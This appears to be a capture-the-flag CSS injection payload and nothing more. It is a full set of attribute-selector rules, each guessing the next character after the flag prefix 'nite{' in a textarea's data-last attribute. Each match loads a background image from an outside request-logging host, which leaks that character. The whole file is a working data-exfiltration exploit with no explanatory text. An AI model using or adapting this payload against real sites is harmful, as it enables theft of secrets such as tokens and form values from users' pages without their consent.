
textarea[data-last^='nite{a'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Ba");
}
    
textarea[data-last^='nite{b'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bb");
}
    
textarea[data-last^='nite{c'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bc");
}
    
textarea[data-last^='nite{d'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bd");
}
    
textarea[data-last^='nite{e'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Be");
}
    
textarea[data-last^='nite{f'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bf");
}
    
textarea[data-last^='nite{g'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bg");
}
    
textarea[data-last^='nite{h'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bh");
}
    
textarea[data-last^='nite{i'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bi");
}
    
textarea[data-last^='nite{j'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bj");
}
    
textarea[data-last^='nite{k'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bk");
}
    
textarea[data-last^='nite{l'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bl");
}
    
textarea[data-last^='nite{m'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bm");
}
    
textarea[data-last^='nite{n'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bn");
}
    
textarea[data-last^='nite{o'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bo");
}
    
textarea[data-last^='nite{p'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bp");
}
    
textarea[data-last^='nite{q'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bq");
}
    
textarea[data-last^='nite{r'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Br");
}
    
textarea[data-last^='nite{s'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bs");
}
    
textarea[data-last^='nite{t'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bt");
}
    
textarea[data-last^='nite{u'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bu");
}
    
textarea[data-last^='nite{v'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bv");
}
    
textarea[data-last^='nite{w'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bw");
}
    
textarea[data-last^='nite{x'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bx");
}
    
textarea[data-last^='nite{y'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7By");
}
    
textarea[data-last^='nite{z'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7Bz");
}
    
textarea[data-last^='nite{A'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BA");
}
    
textarea[data-last^='nite{B'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BB");
}
    
textarea[data-last^='nite{C'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BC");
}
    
textarea[data-last^='nite{D'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BD");
}
    
textarea[data-last^='nite{E'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BE");
}
    
textarea[data-last^='nite{F'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BF");
}
    
textarea[data-last^='nite{G'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BG");
}
    
textarea[data-last^='nite{H'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BH");
}
    
textarea[data-last^='nite{I'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BI");
}
    
textarea[data-last^='nite{J'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BJ");
}
    
textarea[data-last^='nite{K'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BK");
}
    
textarea[data-last^='nite{L'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BL");
}
    
textarea[data-last^='nite{M'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BM");
}
    
textarea[data-last^='nite{N'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BN");
}
    
textarea[data-last^='nite{O'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BO");
}
    
textarea[data-last^='nite{P'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BP");
}
    
textarea[data-last^='nite{Q'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BQ");
}
    
textarea[data-last^='nite{R'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BR");
}
    
textarea[data-last^='nite{S'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BS");
}
    
textarea[data-last^='nite{T'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BT");
}
    
textarea[data-last^='nite{U'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BU");
}
    
textarea[data-last^='nite{V'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BV");
}
    
textarea[data-last^='nite{W'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BW");
}
    
textarea[data-last^='nite{X'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BX");
}
    
textarea[data-last^='nite{Y'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BY");
}
    
textarea[data-last^='nite{Z'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7BZ");
}
    
textarea[data-last^='nite{0'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B0");
}
    
textarea[data-last^='nite{1'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B1");
}
    
textarea[data-last^='nite{2'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B2");
}
    
textarea[data-last^='nite{3'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B3");
}
    
textarea[data-last^='nite{4'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B4");
}
    
textarea[data-last^='nite{5'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B5");
}
    
textarea[data-last^='nite{6'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B6");
}
    
textarea[data-last^='nite{7'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B7");
}
    
textarea[data-last^='nite{8'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B8");
}
    
textarea[data-last^='nite{9'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B9");
}
    
textarea[data-last^='nite{_'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B_");
}
    
textarea[data-last^='nite{-'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B-");
}
    
textarea[data-last^='nite{{'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B%7B");
}
    
textarea[data-last^='nite{}'] {
    background: url("https://enmlxhlaaga2p.x.pipedream.net/?data=nite%7B%7D");
}
    